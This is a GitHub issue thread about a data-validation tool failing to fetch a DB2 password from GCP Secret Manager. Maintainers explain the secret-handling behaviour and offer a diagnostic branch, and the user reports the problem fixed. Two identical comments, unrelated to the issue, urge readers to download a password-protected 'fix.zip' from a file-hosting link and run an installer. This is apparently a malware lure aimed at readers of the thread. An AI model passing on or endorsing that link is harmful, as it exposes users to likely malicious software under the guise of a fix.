### ISSUE TITLE
secret-manager failed to take the secrets for db2 connection

### ISSUE THREAD

**Issue by manojredward** [GoogleCloudPlatform/professional-services-data-validator#1242]
I am working on connecting DB2 and BQ and created a connection json for DB2 like below
{
"source_type":"DB2",
"secret_manager_type":"GCP",
"secret_manager_project_id":"12345678910",
"host":"",
"port":"",
"user":"XXXX",
"password":"secret_name",
"database":""
}

I have a secret name like 'secret_name' in the project with values as json like below,
projects/12345678910/secrets/secret_name

**secret_name: password**

When i hardcoded the user name and password and add the connection.json in bucket and i am able to connect DB2 and BQ. However when i tried to use the secret manager i am unable to connect. Could you please guide me on this?

And also, if there are any additional packages needed, please let us know.

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by helensilva14** [comment]
Hello! When the `secret-manager` flags are present all connection flags should reference to existing secret names, not only some of them. This information is available in our documentation here: https://github.com/GoogleCloudPlatform/professional-services-data-validator/blob/develop/docs/connections.md#using-gcp-secret-manager.

Could you please try it again after using only secret names for each connection flag? Thanks!

**Comment by manojredward** [comment]
Apart from password all other values are hardcoded in my db2.connection.json
{
"source_type":"DB2",
"secret_manager_type":"GCP",
"secret_manager_project_id":"12345678910",
"host":"10.10.10.10",
"port":"2008",
"user":"test_user",
"password":**"secret_name"**,
"database":"test_db"
}

only **"secret_name"** should be pulled from secret manager and it is not working. Please check this @helensilva14 

just wanted to add,
connection json is pre-created and uploaded into gcs bucket. we are referring the bucket for executing DVT

**Comment by helensilva14** [comment]
Unfortunately our current DVT implementation does not work in the way you are expecting. There are only 2 distinct possibilities at the moment, because it would be an unnecessary complexity if we needed to mix the scenarios:

1. Create multiple secrets (one for each connection parameter, in our case it would 5 secrets - host, port, user, password, database) and reference all of them as you did for the secret created only for the password value
2. Not using Secret Manager and passing all values for the parameters directly/hardcoding

But we do have an open issue to change the behavior 1 (#1074) so a single secret would contain the entire content from the .json file. Would that be helpful for your use case?

**Comment by nj1973** [comment]
Hi @manojredward,
Actually I think the way you are trying to use secrets should work.
I think our code was overly optimistic when trying to fetch secrets. Is it possible for you to test on feature branch `1242-secret-manager-better-logging`?
I'm hoping that will give you more of a clue why secrets are not working for you.

**Comment by manojredward** [comment]
Thanks @nj1973 and @helensilva14.
I am able to pull the secret from the secret manager.
